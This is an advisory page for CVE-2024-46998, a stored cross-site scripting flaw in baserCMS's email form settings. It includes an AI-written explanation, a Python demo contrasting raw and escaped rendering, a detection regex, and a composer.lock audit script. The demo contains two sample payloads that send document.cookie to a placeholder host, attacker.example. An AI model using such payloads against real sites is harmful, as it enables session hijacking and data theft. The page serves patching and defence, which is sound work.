VYPR
Moderate severity · NVD Advisory · Published Oct 24, 2024 · Updated Oct 24, 2024

baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature

CVE-2024-46998

Description

baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in the Edit Email Form Settings Feature. Version 5.1.2 fixes the issue.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A stored cross-site scripting (XSS) vulnerability in baserCMS's Edit Email Form Settings feature allows an authenticated user of the admin panel to save a script that runs in the browser of anyone who later views the affected settings screen.

Vulnerability

Overview

CVE-2024-46998 is a stored cross-site scripting vulnerability in the Edit Email Form Settings feature of baserCMS, a PHP and CakePHP-based website development framework. The vulnerability affects baserCMS 5 series versions prior to 5.1.2. According to the official advisory, the issue stems from improper handling of input data in the email form settings interface, enabling an attacker to store malicious scripts that execute when an administrator views the affected page [2].
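The pattern behind this class of bug, as an added illustration in Python (not baserCMS or CakePHP code): a free-text setting is stored verbatim and later interpolated into the admin page. The setting key, the in-memory store and the two sample payloads are constructed for the example; `html.escape(..., quote=True)` plays the role that CakePHP's `h()` helper (htmlspecialchars with ENT_QUOTES) plays in a real template. The heuristic detector is also part of the example, not a tool the advisory mentions.

```python
import html
import re

# Constructed sample payloads (not taken from the advisory). The first breaks out
# of tag text, the second closes a quoted attribute and adds an event handler.
PAYLOADS = {
    "tag_injection": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "attribute_breakout": '" autofocus onfocus="fetch(\'https://attacker.example/?c=\' + document.cookie)',
}

SETTING_KEY = "mail_form_title"  # hypothetical settings field name
_settings: dict = {}             # stand-in for the CMS's settings table


def save_mail_form_setting(key: str, value: str) -> None:
    """Persist the submitted value verbatim, as a settings form typically does."""
    _settings[key] = value


def render_vulnerable(key: str) -> str:
    """Vulnerable output: the stored setting is interpolated into the admin page raw."""
    value = _settings[key]
    return f'<input name="{key}" value="{value}">\n<p>Current value: {value}</p>'


def render_fixed(key: str) -> str:
    """Hardened output: escape at the output boundary. quote=True also encodes
    quote characters, matching htmlspecialchars(ENT_QUOTES) behind CakePHP's h()."""
    value = html.escape(_settings[key], quote=True)
    return f'<input name="{key}" value="{value}">\n<p>Current value: {value}</p>'


# A raw <script tag, or a closing quote followed by attributes ending in an on*= handler.
_ACTIVE_SCRIPT = re.compile(r'<script\b|"\s+(?:\w+\s+)*on\w+\s*=', re.IGNORECASE)


def has_active_script(markup: str) -> bool:
    """Heuristic: does the rendered markup contain script a browser would execute?"""
    return _ACTIVE_SCRIPT.search(markup) is not None


def demo() -> dict:
    """For each payload, return (vulnerable render executes?, fixed render executes?)."""
    results = {}
    for name, payload in PAYLOADS.items():
        save_mail_form_setting(SETTING_KEY, payload)
        results[name] = (
            has_active_script(render_vulnerable(SETTING_KEY)),
            has_active_script(render_fixed(SETTING_KEY)),
        )
    return results


if __name__ == "__main__":
    for name, (raw, escaped) in demo().items():
        print(f"{name}: vulnerable={raw} fixed={escaped}")
```

Both payloads survive the raw render and are neutralised by the escaped one. The attribute-breakout case is the one worth remembering when reviewing a fix: escaping only `<` and `>` would stop the script tag but not the `" onfocus=` breakout, which is why escaping quotes (ENT_QUOTES) matters in attribute context.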

Exploitation

Prerequisites

Exploitation requires authenticated access to the management screen. The vendor advisory notes that a response is only needed where the management screen is used by multiple people (for example several administrators or contributors) [2]: the attacker needs no privileges beyond those required to edit the email form settings, so the risk is concentrated in installations with shared or delegated administrative access.

Impact

Successful exploitation could allow an attacker to execute arbitrary scripts in the browser of any user viewing the compromised email form settings page. This can lead to session hijacking, defacement, or theft of sensitive data handled within the admin context. The stored nature of the XSS means the malicious payload persists across sessions until manually removed [2].

Mitigation

The vendor has released baserCMS 5.1.2, which fixes the vulnerability [1]. Users should upgrade to 5.1.2 or later; no workaround is described, and upgrading is the only recommended action [2].
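An added audit helper, not vendor tooling, that applies the affected range from this page's package table (`< 5.1.2`) to the version pinned in a project's composer.lock. The sample lock content is constructed; the package name is the Packagist name listed on this page, and the version parser is written for the example.

```python
import json
import re
from typing import Optional

PACKAGE = "baserproject/basercms"   # Packagist name from the advisory table
FIXED_VERSION = "5.1.2"             # first patched release per the advisory

# Constructed composer.lock excerpt (not a real project's lock file).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "cakephp/cakephp", "version": "5.0.8"},
        {"name": "baserproject/basercms", "version": "v5.1.1"},
    ],
    "packages-dev": [],
})

# Optional 'v' prefix, three numeric parts, optional pre-release suffix such as -rc1.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?$")


def parse_version(text: str) -> tuple:
    """Turn 'v5.1.1', '5.1.1' or '5.1.2-rc1' into a sortable tuple.

    A pre-release sorts below the final release of the same number (trailing 0
    versus 1), so '5.1.2-rc1' still counts as older than '5.1.2'. Branch aliases
    like 'dev-master' raise, because no numeric comparison is meaningful.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a release version: {text!r}")
    major, minor, patch, prerelease = m.groups()
    return (int(major), int(minor), int(patch), 0 if prerelease else 1)


def installed_version(lock_json: str, package: str = PACKAGE) -> Optional[str]:
    """Return the version pinned for `package` in a composer.lock document, or None."""
    lock = json.loads(lock_json)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == package:
                return pkg.get("version")
    return None


def is_vulnerable(version: str) -> bool:
    """True when `version` falls in the advisory's affected range (< 5.1.2).

    Comparison is numeric, so '5.1.10' is correctly newer than '5.1.2'.
    """
    return parse_version(version) < parse_version(FIXED_VERSION)


def audit(lock_json: str) -> dict:
    """Summarise one project's exposure from its composer.lock contents."""
    version = installed_version(lock_json)
    if version is None:
        return {"installed": None, "vulnerable": False, "note": f"{PACKAGE} not present"}
    try:
        vulnerable = is_vulnerable(version)
    except ValueError:
        return {"installed": version, "vulnerable": None, "note": "non-release version, check manually"}
    note = f"upgrade to {FIXED_VERSION} or later" if vulnerable else "patched release"
    return {"installed": version, "vulnerable": vulnerable, "note": note}


if __name__ == "__main__":
    print(audit(SAMPLE_LOCK))
```

Run it against a real lock file with `audit(open("composer.lock").read())`. Composer writes installed packages under both `packages` and `packages-dev`, so both sections are scanned; a `dev-*` branch alias is reported as unknown rather than silently passed.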

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                            | Affected versions | Patched versions
baserproject/basercms (Packagist)  | < 5.1.2           | 5.1.2
